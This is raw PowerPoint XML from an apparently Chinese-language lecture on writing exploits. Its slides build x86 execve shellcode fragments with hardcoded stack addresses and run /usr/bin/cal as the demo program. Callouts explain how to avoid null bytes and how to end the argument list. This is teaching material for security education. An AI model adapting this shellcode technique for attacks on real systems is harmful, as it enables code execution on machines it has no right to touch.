              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffffa03,%ebx #ptr to arg 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffff9fb,%ecx #ptr to arg 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov 0xbffff9ff,%edx  #ptr to arg 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xb,%al #set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> for execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffffa03,%ebx #ptr to arg 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffff9fb,%ecx #ptr to arg 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov 0xbffff9ff,%edx  #ptr to arg 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int $80 # make system call to execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>arg 2 array pointer array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char * []={0xbffff9ff, “1111”}; “/usr/bin/cal\0”</a:t>
            </a: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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4257730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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>创建一个零日攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3124200"/>
            <a:ext cx="8153400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xor %eax,%eax #set eax to zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov %eax,0xbffff9ff # set to NULL word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1371600"/>
            <a:ext cx="7467600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28995"/>
              <a:gd name="adj2" fmla="val 68861"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>创建一个零值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>因为直到最后一个字节，该利用都不能包含空字符，必须通过利用代码来设置空指针。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51205" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="4648200"/>
            <a:ext cx="7010400" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27694"/>
              <a:gd name="adj2" fmla="val -79630"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>使它为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>来终止参数列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>这是必须的，因为一个系统调用参数包含空指针结束的指针列表。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55672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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="8153400" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>xor %eax,%eax #set eax to zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov %eax,0xbffff9ff #set to NULL word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xb,%al #set code for execve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="4648200"/>
            <a:ext cx="4038600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35532"/>
              <a:gd name="adj2" fmla="val -127977"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>系统调用设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>0xb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>它等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>中的系统调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17833542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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="8153400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xb,%al #set code for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffffa03,%ebx #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov $0xbffff9fb,%ecx #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov 0xbffff9ff,%edx  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
